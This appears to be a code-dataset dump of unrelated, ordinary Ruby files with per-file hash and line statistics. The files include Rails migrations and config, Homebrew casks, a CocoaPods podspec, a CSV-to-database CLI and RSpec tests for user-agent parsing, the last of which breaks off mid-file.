1caaff007ff27fcc4cd67dce878195bfb2dbabb0 | 177 | class AddIngredientsAndMethodToRecipe < ActiveRecord::Migration[5.1]
def change
add_column :recipes, :ingredients, :text
add_column :recipes, :method, :text
end
end
| 25.285714 | 68 | 0.751412 |
21bf1a87eb25e649bc29bc882de75111db6cdadf | 121 | require "disjoint_set_forest/version"
require "disjoint_set_forest/disjoint_set_forest"
module DisjointSetForest
end
| 17.285714 | 49 | 0.859504 |
e98ec3de5c715ffa2f5a11424738a5a8a79aaacb | 404 | require 'fastlane_core/ui/ui'
module Fastlane
UI = FastlaneCore::UI unless Fastlane.const_defined?("UI")
module Helper
class BundletoolHelper
# class methods that you define here become available in your action
# as `Helper::BundletoolHelper.your_method`
#
def self.show_message
UI.message("Hello from the bundletool plugin helper!")
end
end
end
end
| 23.764706 | 74 | 0.695545 |
91469ae975531a3628129d7582b6934c0a02733e | 609 | cask 'unity-linux-support-for-editor' do
version '2018.2.4f1,cb262d9ddeaf'
sha256 '0e333756d5ac328188f5f0c1e70f4a52c855b95638ac1de2d1b6c8b2d76c2ce8'
url "https://netstorage.unity3d.com/unity/#{version.after_comma}/MacEditorTargetInstaller/UnitySetup-Linux-Support-for-Editor-#{version.before_comma}.pkg"
appcast 'https://unity3d.com/get-unity/download/archive'
name 'Unity Linux Build Support'
homepage 'https://unity3d.com/unity/'
depends_on cask: 'unity'
pkg "UnitySetup-Linux-Support-for-Editor-#{version.before_comma}.pkg"
uninstall pkgutil: 'com.unity3d.LinuxStandaloneSupport'
end
| 38.0625 | 156 | 0.791461 |
1cf0b6dc46d9198a0c9764df9fb3ec28933775cb | 302 | class Ey::Core::Client::SslCertificates < Ey::Core::Collection
model Ey::Core::Client::SslCertificate
self.model_root = "ssl_certificate"
self.model_request = :get_ssl_certificate
self.collection_root = "ssl_certificates"
self.collection_request = :get_ssl_certificates
end
| 30.2 | 62 | 0.741722 |
3970b63cff00bc25a1f7d60728ba114f1c5a36c3 | 2,540 | Pod::Spec.new do |s|
s.name = 'IBMWatsonSpeechToTextV1'
s.version = '3.0.0'
s.summary = 'Client framework for the IBM Watson Speech to Text service'
s.description = <<-DESC
The IBM® Speech to Text leverages machine intelligence to transcribe the human voice accurately.
The service combines information about grammar and language structure with knowledge of the composition
of the audio signal. It continuously returns and retroactively updates a transcription as more speech is heard.
DESC
s.homepage = 'https://www.ibm.com/watson/services/speech-to-text/'
s.license = { :type => 'Apache License, Version 2.0', :file => 'LICENSE' }
s.authors = { 'Jeff Arn' => '[email protected]',
'Mike Kistler' => '[email protected]' }
s.module_name = 'SpeechToText'
s.ios.deployment_target = '10.0'
s.source = { :git => 'https://github.com/watson-developer-cloud/swift-sdk.git', :tag => s.version.to_s }
s.source_files = 'Source/SpeechToTextV1/**/*.swift',
'Source/SupportingFiles/InsecureConnection.swift',
'Source/SupportingFiles/Shared.swift',
'Source/SupportingFiles/Dependencies/Source/**/*'
s.exclude_files = 'Source/SpeechToTextV1/Shared.swift',
'**/config_types.h',
'**/opus_header.h',
'**/opus_header.c'
s.swift_version = ['4.2', '5.0', '5.1']
s.dependency 'IBMSwiftSDKCore', '~> 1.0.0'
s.dependency 'Starscream', '3.0.5'
s.vendored_libraries = 'Source/SupportingFiles/Dependencies/Libraries/*.a'
# The renaming of libogg.a and libopus.a is done to avoid duplicate library name errors
# in case TextToSpeech is being installed in the same app (which also includes libogg and libopus)
# The ogg/ and opus/ files are flattened to the same directory so that all #include statements work
s.prepare_command = <<-CMD
cd Source/SupportingFiles/Dependencies/Libraries
mv libogg.a libogg_stt.a
mv libopus.a libopus_stt.a
cd ../Source
mv ogg/* .
mv opus/* .
rm -rf ogg
rm -rf opus
CMD
end
| 51.836735 | 121 | 0.551969 |
bf61f9e58c47ee7ab1fadc2676601523c184caa9 | 1,025 | require 'abstract_unit'
class SafeBufferTest < ActiveSupport::TestCase
def setup
@buffer = ActiveSupport::SafeBuffer.new
end
test "Should look like a string" do
assert @buffer.is_a?(String)
assert_equal "", @buffer
end
test "Should escape a raw string which is passed to them" do
@buffer << "<script>"
assert_equal "<script>", @buffer
end
test "Should NOT escape a safe value passed to it" do
@buffer << "<script>".html_safe
assert_equal "<script>", @buffer
end
test "Should not mess with an innocuous string" do
@buffer << "Hello"
assert_equal "Hello", @buffer
end
test "Should not mess with a previously escape test" do
@buffer << ERB::Util.html_escape("<script>")
assert_equal "<script>", @buffer
end
test "Should be considered safe" do
assert @buffer.html_safe?
end
test "Should return a safe buffer when calling to_s" do
new_buffer = @buffer.to_s
assert_equal ActiveSupport::SafeBuffer, new_buffer.class
end
end
| 24.404762 | 62 | 0.68878 |
d52be119349d266f8b1af199745026d48027c18c | 273 | class TwitterUser < ActiveRecord::Base
has_many :tweets
def tweets_stale?
Time.new - self.tweets.last.updated_at >= 900
end
def fetch_tweets!
CLIENT.user_timeline(self.username).each do |tweet|
self.tweets.create(text: tweet.text)
end
end
end | 19.5 | 55 | 0.70696 |
87299dec1f45432e7d7d91d70e58e5baa1e7a47f | 62 | json.array!(
@posts,
partial: 'posts/post',
as: :post
)
| 10.333333 | 24 | 0.580645 |
ed6af755c052371c763362aaf989499297ba142e | 826 | module Catechism::Matchers
class Change < Struct.new(:operation, :negated, :subject)
attr_reader :expected_difference, :computed_difference
def by(expected_difference)
@expected_difference = expected_difference
raise failure_message unless valid?
end
def valid?
original_value = subject.call
operation.call
value_after_operation = subject.call
@computed_difference = value_after_operation - original_value
(computed_difference == expected_difference) ^ negated
end
def failure_message
if negated
"Expected subject not to change, but it changed by #{computed_difference}"
else
"Expected subject to change by #{expected_difference}, but it changed by #{computed_difference}"
end
end
end
end
| 30.592593 | 105 | 0.690073 |
bf734c57058cf24f817be79f4edd3a49e24f54c2 | 1,897 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.seconds.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 35.12963 | 85 | 0.762256 |
1c3ae0ccaab9096037b94018794d4f9534a75477 | 1,351 | require 'thor'
require 'csv'
module CtoD
class CLI < Thor
desc "export CSV DATABASE", "Export CSV data to DATABASE"
option :string_size, aliases:"-s", default:100
def export(from, to)
db = create_table(from, to)
db.export
puts "CSV data exported successfully."
end
desc "create_table CSV DATABASE", "Create a database table for CSV"
option :string_size, aliases:"-s", default:100
def create_table(from, to)
db = DB.new(from, to, string_size: options[:string_size])
if db.table_exists?
puts "Table '#{db.table_name}' exsist."
else
db.create_table
puts "Table '#{db.table_name}' created at #{db.uri}."
end
db
end
desc "table_columns CSV", "Show column name and type pairs for a table based on given CSV"
option :string_size, aliases:"-s", default:100
def table_columns(csv)
csv_data = CSV.table(csv, header_converters:->h{h.strip})
columns = DB.build_columns(csv_data, string_size: options[:string_size])
puts "\e[32mcolumn name\e[0m :type"
puts "----------------------------"
puts columns.map { |name_type| "\e[32m%s\e[0m :%s" % name_type }
end
desc "version", "Show CtoD version"
def version
puts "CtoD #{CtoD::VERSION} (c) 2013 kyoendo"
end
map "-v" => :version
end
end
| 30.704545 | 94 | 0.621762 |
d5b31799dce1836f9380587ebf3b159263c55c29 | 2,398 | # Adapted from https://github.com/Homebrew/homebrew-cask/blob/ef85fb108065ee36e0f8b4d0da9745c9ed5bde6b/Casks/libreoffice.rb
# Copyright © 2013, Paul Hinze & Contributors, released under the BSD 2-Clause License: https://github.com/Homebrew/homebrew-cask/blob/ef85fb108065ee36e0f8b4d0da9745c9ed5bde6b/LICENSE
# All rights reserved.
cask "libreoffice-prerelease" do
version "7.2.2.2"
sha256 "dc2fd0577e3ee4f99c79d235a6efcd8fecc7069d24090c4eaea69e0fad8245ae"
url "https://download.documentfoundation.org/libreoffice/testing/#{version.major_minor_patch}/mac/x86_64/LibreOffice_#{version}_MacOS_x86-64.dmg",
verified: "documentfoundation.org/"
name "LibreOffice"
desc "Free cross-platform office suite"
homepage "https://www.libreoffice.org/"
livecheck do
url "https://download.documentfoundation.org/libreoffice/testing/#{version.major_minor_patch}/mac/x86_64/"
strategy :page_match
regex(/href="LibreOffice_(\d+(?:\.\d+)*)_MacOS_x86-64.dmg"/i)
end
conflicts_with cask: [
"libreoffice",
"homebrew/cask-versions/libreoffice-still",
]
depends_on macos: ">= :yosemite"
app "LibreOffice.app"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/gengal"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/regmerge"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/regview"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/senddoc"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/ui-previewer"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/uno"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/unoinfo"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/unopkg"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/uri-encode"
binary "#{appdir}/LibreOffice.app/Contents/MacOS/xpdfimport"
# shim script (https://github.com/Homebrew/homebrew-cask/issues/18809)
shimscript = "#{staged_path}/soffice.wrapper.sh"
binary shimscript, target: "soffice"
preflight do
IO.write shimscript, <<~EOS
#!/bin/sh
'#{appdir}/LibreOffice.app/Contents/MacOS/soffice' "$@"
EOS
end
zap trash: [
"~/Library/Application Support/LibreOffice",
"~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/org.libreoffice.script.sfl*",
"~/Library/Preferences/org.libreoffice.script.plist",
"~/Library/Saved Application State/org.libreoffice.script.savedState",
]
end
| 42.821429 | 183 | 0.755213 |
e85b97bfb0d0dae01d14a188134b874514939454 | 7,003 | RSpec.describe Organisations::PeoplePresenter do
include SearchApiHelpers
include OrganisationHelpers
describe "ministers" do
let(:people_presenter) { presenter_from_organisation_hash(organisation_with_ministers) }
it "formats data for image card component" do
expected = {
title: "Our ministers",
people: {
brand: "attorney-generals-office",
href: "/government/people/oliver-dowden",
image_src: "/photo/oliver-dowden",
description: nil,
metadata: nil,
heading_text: "Oliver Dowden CBE MP",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
extra_details: [
{
text: "Parliamentary Secretary (Minister for Implementation)",
href: "/government/ministers/parliamentary-secretary",
},
],
},
}
expect(people_presenter.all_people.first[:title]).to eq(expected[:title])
expect(people_presenter.all_people.first[:people][0]).to eq(expected[:people])
end
it "handles ministers with multiple roles" do
expected = {
title: "Our ministers",
people: {
brand: "attorney-generals-office",
href: "/government/people/theresa-may",
image_src: "/photo/theresa-may",
description: nil,
metadata: nil,
heading_text: "The Rt Hon Theresa May MP",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
extra_details: [
{
text: "Prime Minister",
href: "/government/ministers/prime-minister",
},
{
text: "Minister for the Civil Service",
href: "/government/ministers/minister-for-the-civil-service",
},
],
},
}
expect(people_presenter.all_people.first[:title]).to eq(expected[:title])
expect(people_presenter.all_people.first[:people][2]).to eq(expected[:people])
end
it "orders minister roles by seniority" do
expected = {
title: "Our ministers",
people: {
brand: "attorney-generals-office",
href: "/government/people/victoria-atkins",
image_src: "/photo/victoria-atkins",
description: nil,
metadata: nil,
heading_text: "Victoria Atkins MP",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
extra_details: [
{
text: "Minister of State",
href: "/government/ministers/minister-of-state--61",
},
{
text: "Minister for Afghan Resettlement",
href: "/government/ministers/minister-for-afghan-resettlement",
},
],
},
}
expect(people_presenter.all_people.first[:people][3]).to eq(expected[:people])
end
it "returns minister without image if no image available" do
expected = {
title: "Our ministers",
people: {
brand: "attorney-generals-office",
href: "/government/people/stuart-andrew",
description: nil,
metadata: nil,
heading_text: "Stuart Andrew MP",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
extra_details: [
{
text: "Parliamentary Under Secretary of State",
href: "/government/ministers/parliamentary-under-secretary-of-state--94",
},
],
},
}
expect(people_presenter.all_people.first[:title]).to eq(expected[:title])
expect(people_presenter.all_people.first[:people][1]).to eq(expected[:people])
end
end
describe "non-ministers" do
let(:people_presenter) { presenter_from_organisation_hash(organisation_with_board_members) }
it "keeps the order for types of people" do
no_people_presenter = presenter_from_organisation_hash(organisation_with_no_people)
expected = [
{
type: :ministers,
title: "Our ministers",
people: [],
lang: false,
},
{
type: :military_personnel,
title: "Our senior military officials",
people: [],
lang: false,
},
{
type: :board_members,
title: "Our management",
people: [],
lang: false,
},
{
type: :traffic_commissioners,
title: "Traffic commissioners",
people: [],
lang: false,
},
{
type: :special_representatives,
title: "Special representatives",
people: [],
lang: false,
},
{
type: :chief_professional_officers,
title: "Chief professional officers",
people: [],
lang: false,
},
]
expect(no_people_presenter.all_people).to eq(expected)
end
it "displays role as descriptions rather than links" do
expect(people_presenter.all_people.third[:people][0][:description]).to eq("Cabinet Secretary")
expect(people_presenter.all_people.third[:people][0][:extra_details]).to be_nil
end
it "handles non-ministers with multiple roles" do
expected = "Chief Executive of the Civil Service, Permanent Secretary (Cabinet Office)"
expect(people_presenter.all_people.third[:people][1][:description]).to eq(expected)
end
it "does not show images for non-important board members" do
non_important_board_members = presenter_from_organisation_hash(organisation_with_non_important_board_members)
expected_important = {
brand: "attorney-generals-office",
href: "/government/people/jeremy-heywood",
description: "Cabinet Secretary",
metadata: "Unpaid",
heading_text: "Sir Jeremy Heywood",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
image_src: "/photo/jeremy-heywood",
}
expected_non_important = {
brand: "attorney-generals-office",
href: "/government/people/john-manzoni",
description: "Chief Executive of the Civil Service",
metadata: nil,
heading_text: "John Manzoni",
lang: "en",
heading_level: 0,
extra_details_no_indent: true,
}
expect(non_important_board_members.all_people.third[:people][0]).to eq(expected_important)
expect(non_important_board_members.all_people.third[:people][1]).to eq(expected_non_important)
end
it "fetches image" do
expect(people_presenter.all_people.third[:people][0][:image_src]).to eq("/photo/jeremy-heywood")
end
end
def presenter_from_organisation_hash(content)
content_item = ContentItem.new(content)
organisation = Organisation.new(content_item)
Organisations::PeoplePresenter.new(organisation)
end
end
| 32.123853 | 115 | 0.593746 |
ac142f58c16a14714d14ba46bffc5f78831c5b7e | 727 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'bundler/setup'
require 'database_cleaner/active_record'
require 'pry'
require 'simplecov'
SimpleCov.start do
enable_coverage :branch
add_filter { |src| src.filename =~ %r,db/(connection|models|schema), }
add_filter 'spec/activerecord'
end
require 'activerecord/wrapped_transaction'
require_relative '../db/connection'
RSpec::Matchers.define_negated_matcher :never_yield_control, :yield_control
RSpec.configure do |config|
config.before(:suite) do
DatabaseCleaner.strategy = :transaction
DatabaseCleaner.clean_with :truncation
end
config.around(:each) do |example|
DatabaseCleaner.cleaning do
example.run
end
end
end
| 22.71875 | 75 | 0.76066 |
1860a1718e86de3cd465f8328efc57ee7e823fc5 | 344 | require File.expand_path('../test_helper', __FILE__)
require 'hopper/queue'
require 'hopper/channel'
module Hopper
module Test
class Listener
@channel = Hopper::Channel.new
@queue = Hopper::Queue.new("hopper-perftest-out").listener(@channel)
@queue.listen do |msg|
msg.acknowledge
end
end
end
end
| 19.111111 | 74 | 0.668605 |
1d88129264c48ef5e42c3ac9f621d23ef73549b5 | 1,794 | require "spec_helper"
describe Volunteer do
describe '#name' do
it 'returns the name of the volunteer' do
test_volunteer = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
expect(test_volunteer.name).to eq 'Jane'
end
end
describe '#project_id' do
it 'returns the project_id of the volunteer' do
test_volunteer = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
expect(test_volunteer.project_id).to eq 1
end
end
describe '#==' do
it 'checks for equality based on the name of a volunteer' do
volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
volunteer2 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
expect(volunteer1 == volunteer2).to eq true
end
end
context '.all' do
it 'is empty to start' do
expect(Volunteer.all).to eq []
end
it 'returns all volunteers' do
volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
volunteer1.save
volunteer2 = Volunteer.new({:name => 'Joe', :project_id => 1, :id => nil})
volunteer2.save
expect(Volunteer.all).to eq [volunteer1, volunteer2]
end
end
describe '#save' do
it 'adds a volunteer to the database' do
volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
volunteer1.save
expect(Volunteer.all).to eq [volunteer1]
end
end
describe '.find' do
it 'returns a volunteer by id' do
volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil})
volunteer1.save
volunteer2 = Volunteer.new({:name => 'Joe', :project_id => 1, :id => nil})
volunteer2.save
expect(Volunteer.find(volunteer1.id)).to eq volunteer1
end
end
end
| 31.473684 | 85 | 0.618729 |
26b97b1d86998ee378afdd4aae903642b5b91d2f | 87 | # desc "Explaining what the task does"
# task :good_item do
# # Task goes here
# end
| 17.4 | 38 | 0.678161 |
4ab485a417c2c44a4dd4027832186d627c1115e0 | 67 | module Houston
module Exceptions
VERSION = "0.0.1"
end
end
| 11.166667 | 21 | 0.671642 |
03e10639d632d6b79fd5ab0af2a844c27ff46aa2 | 1,468 | #
# Be sure to run `pod lib lint YourPod.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'YourPod'
s.version = '0.1.1'
s.summary = '一个简短的pod介绍。。。'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = '一个很长的描述说明信息'
s.homepage = 'https://github.com/Bluter/YourPod'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Bluter' => 'xx@pxx' }
s.source = { :git => 'https://github.com/Bluter/YourPod.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'YourPod/Classes/**/*.{h,m}'
s.resource_bundles = {
'YourPod' => ['YourPod/Assets/*.png']
}
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
s.dependency 'AFNetworking', '~> 2.3'
end
| 35.804878 | 98 | 0.632834 |
e86d7de3acdaae9691d7a77985cf6736e0ee36f4 | 2,316 | # frozen_string_literal: true
require "spec_helper"
RSpec.describe "Mapper definition DSL" do
include_context "container"
before do
configuration.relation(:users)
users = configuration.default.dataset(:users)
users.insert(name: "Joe", roles: ["admin", "user", "user", nil])
users.insert(name: "Jane", roles: "user")
users.insert(name: "John")
end
describe "unfold" do
let(:mapped_users) { container.relations[:users].map_with(:users).to_a }
it "splits the attribute" do
configuration.mappers do
define(:users) { unfold :roles }
end
expect(mapped_users).to eql [
{name: "Joe", roles: "admin"},
{name: "Joe", roles: "user"},
{name: "Joe", roles: "user"},
{name: "Joe", roles: nil},
{name: "Jane", roles: "user"},
{name: "John"}
]
end
it "renames unfolded attribute when necessary" do
configuration.mappers do
define(:users) { unfold :role, from: :roles }
end
expect(mapped_users).to eql [
{name: "Joe", role: "admin"},
{name: "Joe", role: "user"},
{name: "Joe", role: "user"},
{name: "Joe", role: nil},
{name: "Jane", role: "user"},
{name: "John"}
]
end
it "rewrites the existing attribute" do
configuration.mappers do
define(:users) { unfold :name, from: :roles }
end
expect(mapped_users).to eql [
{name: "admin"},
{name: "user"},
{name: "user"},
{name: nil},
{name: "user"},
{}
]
end
it "ignores the absent attribute" do
configuration.mappers do
define(:users) { unfold :foo, from: :absent }
end
expect(mapped_users).to eql [
{name: "Joe", roles: ["admin", "user", "user", nil]},
{name: "Jane", roles: "user"},
{name: "John"}
]
end
it "accepts block" do
configuration.mappers do
define(:users) { unfold(:role, from: :roles) {} }
end
expect(mapped_users).to eql [
{name: "Joe", role: "admin"},
{name: "Joe", role: "user"},
{name: "Joe", role: "user"},
{name: "Joe", role: nil},
{name: "Jane", role: "user"},
{name: "John"}
]
end
end
end
| 24.638298 | 76 | 0.528929 |
bfa5f8561e206c074aaf186cfda13eef5c11a789 | 13,718 | require 'user_agent'
shared_examples_for "Firefox browser" do
it "should return 'Firefox' as its browser" do
@useragent.browser.should == "Firefox"
end
it "should return :strong as its security" do
@useragent.security.should == :strong
end
it { @useragent.should_not be_webkit }
end
describe 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8')
end
it_should_behave_like "Firefox browser"
it "should return '4.0b8' as its version" do
@useragent.version.should == "4.0b8"
end
it "should return '20100101' as its gecko version" do
@useragent.gecko.version.should == "20100101"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X 10.6' as its os" do
@useragent.os.should == "OS X 10.6"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
it { @useragent.should_not be_mobile }
end
describe 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13')
end
it_should_behave_like "Firefox browser"
it "should return '3.6.13' as its version" do
@useragent.version.should == "3.6.13"
end
it "should return '20101203' as its gecko version" do
@useragent.gecko.version.should == "20101203"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X 10.6' as its os" do
@useragent.os.should == "OS X 10.6"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
it { @useragent.should_not be_mobile }
end
describe "UserAgent: 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1")
end
it_should_behave_like "Firefox browser"
it "should return '3.0.1' as its version" do
@useragent.version.should == "3.0.1"
end
it "should return '2008070206' as its gecko version" do
@useragent.gecko.version.should == "2008070206"
end
it "should return 'X11' as its platform" do
@useragent.platform.should == "X11"
end
it "should return 'Linux i686' as its os" do
@useragent.os.should == "Linux i686"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
it { @useragent.should_not be_mobile }
end
describe "UserAgent: 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14")
end
it_should_behave_like "Firefox browser"
it "should return '2.0.0.14' as its version" do
@useragent.version.should == "2.0.0.14"
end
it "should return '20080404' as its gecko version" do
@useragent.gecko.version.should == "20080404"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'OS X' as its os" do
@useragent.os.should == "OS X"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14")
end
it_should_behave_like "Firefox browser"
it "should return '2.0.0.14' as its version" do
@useragent.version.should == "2.0.0.14"
end
it "should return '20080404' as its gecko version" do
@useragent.gecko.version.should == "20080404"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows XP' as its os" do
@useragent.os.should == "Windows XP"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1")
end
it_should_behave_like "Firefox browser"
it "should return '16.0.1' as its version" do
@useragent.version.should == "16.0.1"
end
it "should return '20121011' as its gecko version" do
@useragent.gecko.version.should == "20121011"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows 7' as its os" do
@useragent.os.should == "Windows 7"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
end
describe "UserAgent: 'Mozilla/5.0 (Windows NT 6.1; Win64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Windows NT 6.1; Win64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1")
end
it_should_behave_like "Firefox browser"
it "should return '16.0.1' as its version" do
@useragent.version.should == "16.0.1"
end
it "should return '20121011' as its gecko version" do
@useragent.gecko.version.should == "20121011"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows 7' as its os" do
@useragent.os.should == "Windows 7"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
end
describe 'Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0')
end
it_should_behave_like "Firefox browser"
it "should return '17.0' as its version" do
@useragent.version.should == "17.0"
end
it "should return '20100101' as its gecko version" do
@useragent.gecko.version.should == "20100101"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows XP' as its os" do
@useragent.os.should == "Windows XP"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
end
describe 'UserAgent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0' do
before do
@useragent = UserAgent.parse('Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0')
end
it_should_behave_like "Firefox browser"
it "should return '17.0' as its version" do
@useragent.version.should == "17.0"
end
it "should return '20100101' as its gecko version" do
@useragent.gecko.version.should == "20100101"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows 7' as its os" do
@useragent.os.should == "Windows 7"
end
it "should return nil as its localization" do
@useragent.localization.should be_nil
end
end
describe "UserAgent: 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12")
end
it_should_behave_like "Firefox browser"
it "should return '1.5.0.12' as its version" do
@useragent.version.should == "1.5.0.12"
end
it "should return '20070508' as its gecko version" do
@useragent.gecko.version.should == "20070508"
end
it "should return 'Macintosh' as its platform" do
@useragent.platform.should == "Macintosh"
end
it "should return 'PPC Mac OS X Mach-O' as its os" do
@useragent.os.should == "OS X"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12")
end
it_should_behave_like "Firefox browser"
it "should return '1.5.0.12' as its version" do
@useragent.version.should == "1.5.0.12"
end
it "should return '20070508' as its gecko version" do
@useragent.gecko.version.should == "20070508"
end
it "should return 'Windows' as its platform" do
@useragent.platform.should == "Windows"
end
it "should return 'Windows XP' as its os" do
@useragent.os.should == "Windows XP"
end
it "should return 'en-US' as its localization" do
@useragent.localization.should == "en-US"
end
end
describe "UserAgent: 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060612 Firefox/1.5.0.4 Flock/0.7.0.17.1'" do
before do
@useragent = UserAgent.parse("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060612 Firefox/1.5.0.4 Flock/0.7.0.17.1")
end
it_should_behave_like "Firefox browser"
it "should return '1.5.0.4' as its version" do
@useragent.version.should == "1.5.0.4"
end
